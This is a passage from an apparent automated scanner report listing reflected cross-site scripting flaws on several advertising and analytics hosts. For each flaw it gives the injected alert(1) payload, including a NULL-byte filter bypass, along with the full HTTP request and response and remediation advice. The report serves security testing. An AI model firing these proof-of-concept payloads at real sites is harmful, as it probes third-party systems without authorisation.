GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2e HTTP/1.1 Host: ad.agkn.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=OPTOUT
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: uuid=657572620850510527; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:06 GMT; Path=/ P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: u=6|0BEIV%2BNJSAAAAABIBArwBATUBC%2FEB8AADAUIBB4ABQwEHgAFBAQeAAQK8fnhU7Shw8lB7AAAAAAAAAyUAAAAAAAAL8QAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:06 GMT; Path=/ Cache-Control: max-age=0, must-revalidate Pragma: no-cache Expires: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta ht ...[SNIP]... <a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=a5798"><script>alert(1)</script>bbf67718b2ehttp://ad.agkn.com/interaction!che=989082879?imid=8670815940544450683&ipid=805&caid=700&cgid=309&crid=3057&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Servi ...[SNIP]...
2.13. http://ads.media.net/medianet.php [size parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.media.net
Path: /medianet.php
Issue detail
The value of the size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f42'%3balert(1)//acefc548551 was submitted in the size parameter. This input was echoed as 71f42';alert(1)//acefc548551 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /medianet.php?cid=7CU2PK0I5&size=300x25071f42'%3balert(1)//acefc548551&crid=712228940&ran=0.19952531741000712 HTTP/1.1 Host: ads.media.net Proxy-Connection: keep-alive Referer: http://shopping.yahoo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Date: Tue, 06 Sep 2011 12:45:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.6 Content-Length: 6882 Connection: close Content-Type: text/html; charset=UTF-8
<html><head></head><body style="margin: 0px; padding: 0px;"> <script language="javascript" type="text/javascript"> (function(){ var staticFrameUrl = 'http://srv.cdn-media.net/'; var requrl = '', fd = '', servingURL = 'http://search.keywordblocks.com/cmdynet?', kurl = '', cid = '7CU2PK0I5', size = '300x25071f42';alert(1)//acefc548551', crid = '712228940', widthx = '300', heighty = '25071f42';alert(1)//acefc548551';window._mN={};_mN._util={isAdProviderUrl:function(a){if(a==undefined||a==""){return false}return(_mN._sjc.providers.te ...[SNIP]...
2.14. http://ads.pointroll.com/PortalServe/ [r parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.pointroll.com
Path: /PortalServe/
Issue detail
The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a17b3"%3balert(1)//1d7d4442f53 was submitted in the r parameter. This input was echoed as a17b3";alert(1)//1d7d4442f53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647a17b3"%3balert(1)//1d7d4442f53 HTTP/1.1 Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://new.music.yahoo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 06 Sep 2011 12:45:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache
document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0 ...[SNIP]... Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647a17b3";alert(1)//1d7d4442f53&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'> ...[SNIP]...
2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.pointroll.com
Path: /PortalServe/
Issue detail
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5d9"-alert(1)-"b85f3aab297 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&r=0.34970951941795647 HTTP/1.1 Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://new.music.yahoo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 06 Sep 2011 12:45:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache
document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0 ...[SNIP]... 99999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$bd5d9"-alert(1)-"b85f3aab297&time=2|12:45|-5&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'> ...[SNIP]...
2.16. http://ads.pointroll.com/PortalServe/ [time parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.pointroll.com
Path: /PortalServe/
Issue detail
The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7cb"%3balert(1)//5a34bad3e0 was submitted in the time parameter. This input was echoed as 9d7cb";alert(1)//5a34bad3e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-59d7cb"%3balert(1)//5a34bad3e0&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647 HTTP/1.1 Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://new.music.yahoo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 06 Sep 2011 12:45:16 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache
document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0 ...[SNIP]... usic/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-59d7cb";alert(1)//5a34bad3e0&r=0.34970951941795647&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'> ...[SNIP]...
2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.teracent.net
Path: /tase/ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c7a"><script>alert(1)</script>8352cc5bcec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1 HTTP/1.1 Host: adserver.teracent.net Proxy-Connection: keep-alive Referer: http://finance.yahoo.com/lookup?s=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Expires: Sat, 6 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: imp=a$le#1315313290665_68296156_as3105_imp|305#1315313290665_68296156_as3105_imp|374#1315258459362_65704651_as3105_imp|e2366%00%0d%0ae94350cc287#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|7e97a%00%0d%0a7815b11943f#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:48:10 GMT Content-Length: 2600
<!DOCTYPE html> <!-- Impression Id: 1315313290665_68296156_as3105_imp --> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"/> ...[SNIP]... .859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*&a5c7a"><script>alert(1)</script>8352cc5bcec=1http://adserver.teracent.net/tase/redir/1315313290665_68296156_as3105_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0LK1F-qnZuNrkHiIxSRE6EeBUdOlSCybtgzVS3aoQsH8nsP77FPnyfvBBIXH2b3up1DiXXlMDkQQAJEZ1Br4jy5PQgEhUQSyNo ...[SNIP]...
2.18. http://adserver.teracent.net/tase/ad [rcu parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.teracent.net
Path: /tase/ad
Issue detail
The value of the rcu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4ae"><script>alert(1)</script>c6801dc18e5 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_165052&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=147582&rcu=http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5 HTTP/1.1 Host: adserver.teracent.net Proxy-Connection: keep-alive Referer: http://finance.yahoo.com/lookup?s=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315313083608_171477072_ap3104_int|374#1315258459362_65704651_as3105_imp|; p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Expires: Sat, 6 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: imp=a$le#1315313290345_68345684_as3104_imp|305#1315313290345_68345684_as3104_imp|374#1315258459362_65704651_as3105_imp|f5d4d72fe77543f7c2420cd7#|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/tase Set-Cookie: p161r=b$u-32#5.8GZ|g-yWB#1.8GZ|f5d4d72f11f08cc6d748514#.|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:48:09 GMT Content-Length: 2576
<!DOCTYPE html> <!-- Impression Id: 1315313290345_68345684_as3104_imp --> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"/> ...[SNIP]... 6.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*7b4ae"><script>alert(1)</script>c6801dc18e5http://adserver.teracent.net/tase/redir/1315313290345_68345684_as3104_imp?q=H4sIAAAAAAAAAFVQu3LDMAz7FVLWM9XQjZt9XXuJP6GtnOjiUefIqZKLrG_rn5XtdemCAQQBkO_56zl6ENBZoZ0yqA3F6YeQAkRnUShJZf1PjMYxGqfGNAlANZZHo ...[SNIP]...
2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://beacon.partners-z.com
Path: /yre/20100908/b
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 93b5d<script>alert(1)</script>db9aaf04338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1 Host: beacon.partners-z.com Proxy-Connection: keep-alive Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 X-Cascade: pass Content-Type: text/plain Content-Length: 67 Date: Tue, 06 Sep 2011 12:49:57 GMT
Not Found: /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b
2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://beacon.partners-z.com
Path: /yre/20100908/b
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fb9e5<script>alert(1)</script>37006748ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1 Host: beacon.partners-z.com Proxy-Connection: keep-alive Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 X-Cascade: pass Content-Type: text/plain Content-Length: 66 Date: Tue, 06 Sep 2011 12:49:59 GMT
Not Found: /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec
2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comcast-www.baynote.net
Path: /baynote/tags3/guide/results-xsl/comcast-www
Issue detail
The value of the elementIds request parameter is copied into the HTML document as plain text between tags. The payload %00ee062<script>alert(1)</script>6f2ae7bb9cf was submitted in the elementIds parameter. This input was echoed as ee062<script>alert(1)</script>6f2ae7bb9cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /baynote/tags3/guide/results-xsl/comcast-www?userId=6923713561343025788&customerId=comcast&code=www&id=1&query=xss&url=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&appendParams=&rankParam=&condition=d%26g%26s&elementIds=com_search_rightrail_b%00ee062<script>alert(1)</script>6f2ae7bb9cf&v=1 HTTP/1.1 Host: comcast-www.baynote.net Proxy-Connection: keep-alive Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: BNServer Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=ISO-8859-1 Content-Length: 156 Date: Tue, 06 Sep 2011 12:22:28 GMT
bnTagManager.getTag(1).divId = "com_search_rightrail_b.ee062<script>alert(1)</script>6f2ae7bb9cf"; bnResourceManager.registerResource("GLResults1");
2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comcastresidentialservices.tt.omtrdc.net
Path: /m2/comcastresidentialservices/mbox/standard
Issue detail
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 819af<script>alert(1)</script>f8868cea7a0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
